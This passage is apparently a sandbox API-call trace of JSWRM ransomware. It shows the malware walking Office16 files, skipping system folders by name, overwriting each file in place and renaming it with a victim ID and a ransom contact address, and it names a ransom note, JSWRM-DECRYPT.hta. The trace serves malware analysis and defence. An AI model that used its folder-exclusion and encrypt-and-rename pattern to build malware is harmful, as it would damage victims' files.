Size=0x20) returned 0x2410d8 [0143.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0143.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0143.769] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c59f60d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4c59f60d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4c59f60d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0143.769] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0143.769] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd71a51a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd71a51a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd7406da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xad30, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="rdpqoemetrics.dll", cAlternateFileName="RDPQOE~1.DLL")) returned 1 [0143.769] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2=".") returned 1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="..") returned 1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="...") returned 1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="windows") returned -1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="recovery") returned -1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="perflogs") returned 1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="documents and settings") returned 1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="system volume information") returned -1 [0143.770] lstrcmpiW (lpString1="rdpqoemetrics.dll", lpString2="msocache") returned 1 [0143.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rdpqoemetrics.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0143.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rdpqoemetrics.dll", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rdpqoemetrics.dll", lpUsedDefaultChar=0x0) returned 17 [0143.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rdpqoemetrics.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0143.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rdpqoemetrics.dll", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rdpqoemetrics.dll", lpUsedDefaultChar=0x0) returned 17 [0143.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0143.770] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10a50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="RECALL.DLL", cAlternateFileName="")) returned 1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2=".") returned 1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="..") returned 1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="...") returned 1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="windows") returned -1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="recovery") returned -1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="perflogs") returned 1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="documents and settings") returned 1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="system volume information") returned -1 [0143.770] lstrcmpiW (lpString1="RECALL.DLL", lpString2="msocache") returned 1 [0143.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0143.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECALL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECALL.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RECALL.DLL", lpUsedDefaultChar=0x0) returned 10 [0143.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0143.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECALL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECALL.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RECALL.DLL", lpUsedDefaultChar=0x0) returned 10 [0143.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0143.771] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc640, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="REFEDIT.DLL", cAlternateFileName="")) returned 1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2=".") returned 1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="..") returned 1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="...") returned 1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="windows") returned -1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="recovery") returned 1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="perflogs") returned 1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="documents and settings") returned 1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="system volume information") returned -1 [0143.771] lstrcmpiW (lpString1="REFEDIT.DLL", lpString2="msocache") returned 1 [0143.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0143.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REFEDIT.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REFEDIT.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REFEDIT.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0143.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REFEDIT.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REFEDIT.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REFEDIT.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0143.771] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a900, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="REMINDER.WAV", cAlternateFileName="")) returned 1 [0143.771] lstrcmpiW (lpString1="REMINDER.WAV", lpString2=".") returned 1 [0143.771] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="..") returned 1 [0143.771] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="...") returned 1 [0143.771] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="windows") returned -1 [0143.771] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="recovery") returned 1 [0143.771] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="perflogs") returned 1 [0143.771] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="documents and settings") returned 1 [0143.771] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="$RECYCLE.BIN") returned 1 [0143.772] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="system volume information") returned -1 [0143.772] lstrcmpiW (lpString1="REMINDER.WAV", lpString2="msocache") returned 1 [0143.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0143.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMINDER.WAV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMINDER.WAV", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REMINDER.WAV", lpUsedDefaultChar=0x0) returned 12 [0143.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0143.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMINDER.WAV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMINDER.WAV", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REMINDER.WAV", lpUsedDefaultChar=0x0) returned 12 [0143.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0143.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0143.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\REMINDER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\reminder.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.801] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=108800) returned 1 [0143.801] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a900) returned 0x2501e8 [0143.801] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1a900, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x1a900, lpOverlapped=0x0) returned 1 [0143.809] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.809] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1a900, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x1a900, lpOverlapped=0x0) returned 1 [0143.810] CloseHandle (hObject=0x45c) returned 1 [0143.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0143.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0143.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0143.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0143.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0143.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0143.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0143.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0143.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0143.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0143.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0143.811] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\REMINDER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\reminder.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\REMINDER.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\reminder.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0143.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0143.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0143.813] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb7c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Resources.pri", cAlternateFileName="RESOUR~1.PRI")) returned 1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2=".") returned 1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="..") returned 1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="...") returned 1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="windows") returned -1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="recovery") returned 1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="perflogs") returned 1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="documents and settings") returned 1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="$RECYCLE.BIN") returned 1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="system volume information") returned -1 [0143.813] lstrcmpiW (lpString1="Resources.pri", lpString2="msocache") returned 1 [0143.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0143.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Resources.pri", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Resources.pri", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Resources.pri", lpUsedDefaultChar=0x0) returned 13 [0143.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0143.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0143.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Resources.pri", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Resources.pri", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Resources.pri", lpUsedDefaultChar=0x0) returned 13 [0143.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0143.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0143.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0143.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0143.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Resources.pri" (normalized: "c:\\program files\\microsoft office\\root\\office16\\resources.pri"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.814] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=47040) returned 1 [0143.814] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb7c0) returned 0x27b348 [0143.815] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb7c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0xb7c0, lpOverlapped=0x0) returned 1 [0143.819] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.819] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb7c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0xb7c0, lpOverlapped=0x0) returned 1 [0143.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0143.820] CloseHandle (hObject=0x45c) returned 1 [0143.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0143.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0143.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0143.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0143.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0143.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0143.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0143.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0143.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0143.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0143.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0143.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.821] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Resources.pri" (normalized: "c:\\program files\\microsoft office\\root\\office16\\resources.pri"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Resources.pri.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\resources.pri.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0143.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0143.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0143.822] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x353f7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="RSWOP.ICM", cAlternateFileName="")) returned 1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2=".") returned 1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2="..") returned 1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2="...") returned 1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2="windows") returned -1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2="recovery") returned 1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2="perflogs") returned 1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2="documents and settings") returned 1 [0143.822] 